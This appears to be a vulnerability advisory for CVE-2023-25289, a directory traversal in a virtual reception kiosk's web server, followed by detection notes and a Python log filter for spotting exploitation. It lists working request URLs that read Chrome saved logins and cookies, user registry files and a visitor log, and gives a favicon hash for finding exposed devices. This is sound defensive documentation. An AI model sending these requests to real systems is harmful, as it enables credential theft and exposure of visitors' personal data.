CVE-2023-25289
published 2023-05-04

Priority: P2 · 58
Severity: high (7.5, CVSS 3.1)
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EXPLOIT
EPSS: 7.69% (93.8th percentile)
Directory Traversal vulnerability in virtualreception Digital Receptie version win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 in embedded web server, allows attacker to gain sensitive information via a crafted GET request.

Affected

1 range
Vendor | Product | Version range | Fixed in
virtualreception | digital_reciptie | |

Detection & IOCs (extracted from sources)

url: http://[ip address]/c:/WINDOWS/System32/drivers/etc/hosts
url: http://[ip address]/C:/windows/WindowsUpdate.log
url: http://[ip address]/c:/users/receptie/ntuser.dat
url: http://[ip address]/c:/users/receptie/ntuser.ini
url: http://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log
url: http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User Data/Default/Login Data
url: http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20State
url: http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User Data/Default/Cookies
url: http://[ip address]/visitors.csv
path: c:/WINDOWS/System32/drivers/etc/hosts
path: c:/users/receptie/AppData/Local/Google/Chrome/User Data/Default/Login Data
path: c:/users/receptie/AppData/Local/Google/Chrome/User Data/Default/Cookies
other: http.favicon.hash:656388049
  • Detect directory traversal attempts by monitoring HTTP GET requests containing Windows absolute path patterns (e.g., '/c:/' or '/C:/') in the URI, which are characteristic of this vulnerability's exploitation pattern.
  • Monitor for HTTP GET requests targeting sensitive Chrome credential files via path traversal: 'Login Data', 'Cookies', and 'Local State' under the 'receptie' user profile.
  • Monitor for unauthenticated HTTP GET requests to '/visitors.csv' on Virtual Reception appliances, which exposes visitor registration logs.
  • Use Shodan favicon hash 656388049 to identify exposed Virtual Reception appliances on the internet for asset discovery and attack surface monitoring.
  • The vulnerability is unauthenticated; no session token or credential is required. Any HTTP GET request with a Windows absolute path in the URI should be treated as a traversal attempt.
  • The traversal works by appending Windows absolute paths directly to the server root URL (e.g., '/c:/...'), not via classic '../' sequences. Detection rules must account for this Windows drive-letter path injection pattern.
  • The affected appliance runs on Windows 7 SP1 (win7sp1_rtm.101119-1850 6.1.7601.1.0.65792) on Intel NUC5i5RY hardware; detections should be scoped to this platform context.
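
The detection notes above, written as a filter over web access logs. This is an added example, not code from the advisory or the vendor; the Common Log Format input, the rule names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request and status fields of a Common Log Format line (format is an assumption).
LINE_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>.+?) HTTP/[\d.]+" (?P<status>\d{3})')
# Drive letter as the first path segment: /c:/..., /C:\...
DRIVE_RE = re.compile(r"^/[a-z]:/", re.IGNORECASE)
# Chrome files named in the notes above, under the 'receptie' profile.
CHROME_RE = re.compile(
    r"/users/receptie/appdata/local/google/chrome/user data/"
    r"(default/(login data|cookies)|local state)$", re.IGNORECASE)

def normalize(uri):
    """Strip query/fragment, percent-decode twice, unify slashes."""
    path = re.split(r"[?#]", uri, maxsplit=1)[0]
    for _ in range(2):  # second pass covers double-encoded separators
        path = unquote(path)
    return re.sub(r"/+", "/", path.replace("\\", "/"))

def classify(uri):
    """Return the names of the rules (hypothetical names) a request URI matches."""
    path = normalize(uri)
    hits = []
    if DRIVE_RE.match(path):
        hits.append("drive-letter-path")
    if CHROME_RE.search(path):
        hits.append("chrome-credential-file")
    if path.lower() == "/visitors.csv":
        hits.append("visitors-csv")
    return hits

def scan(lines):
    """Return (line_number, http_status, rules) for every matching log line."""
    alerts = []
    for number, line in enumerate(lines, 1):
        m = LINE_RE.search(line)
        if m and (rules := classify(m["uri"])):
            alerts.append((number, int(m["status"]), rules))
    return alerts

SAMPLE_LOG = [  # constructed lines using documentation address ranges, not captured traffic
    '198.51.100.7 - - [04/May/2023:10:00:01 +0000] "GET /c:/WINDOWS/System32/drivers/etc/hosts HTTP/1.1" 200 824',
    '198.51.100.7 - - [04/May/2023:10:00:05 +0000] "GET /c:/users/receptie/AppData/Local/Google/Chrome/User Data/Default/Login Data HTTP/1.1" 200 40960',
    '198.51.100.7 - - [04/May/2023:10:00:09 +0000] "GET /visitors.csv HTTP/1.1" 200 51200',
    '192.0.2.10 - - [04/May/2023:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
    '198.51.100.7 - - [04/May/2023:10:01:30 +0000] "GET /C%3A/windows/WindowsUpdate.log HTTP/1.1" 404 0',
]
if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

The status code is kept in each alert so that a 200 on a drive-letter request can be triaged as a file actually served rather than only an attempt.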